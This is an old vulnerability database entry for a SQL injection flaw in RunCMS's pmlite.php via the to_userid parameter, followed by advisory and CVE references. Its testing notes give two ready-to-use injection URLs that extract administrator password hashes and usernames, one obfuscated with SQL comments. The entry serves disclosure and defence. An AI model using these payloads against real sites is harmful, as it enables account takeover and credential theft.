RunCMS pmlite.php to_userid Variable SQL Injection

2006-02-14T09:17:38
ID OSVDB:23161
Type osvdb
Reporter OSVDB
Modified 2006-02-14T09:17:38

Description

Manual Testing Notes

http://[target]/modules/messages/pmlite.php?send=2&to_userid=-1%20union%20%20%20%20select%20pass%20from%20runcms_users%20where%20level=5

http://[target]/modules/messages/pmlite.php?send=2&to_userid=-1//union//select//uname//from/*/runcms_users%20where%20level=5/hamid-network-security-team-http://[attacker]

References:

Vendor URL: http://www.runcms.org/
Security Tracker: 1015626
Secunia Advisory ID: 18831
Other Advisory URL: http://hamid.ir/security/runcms.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-02/0279.html
FrSIRT Advisory: ADV-2006-0572
CVE-2006-0721
Bugtraq ID: 16652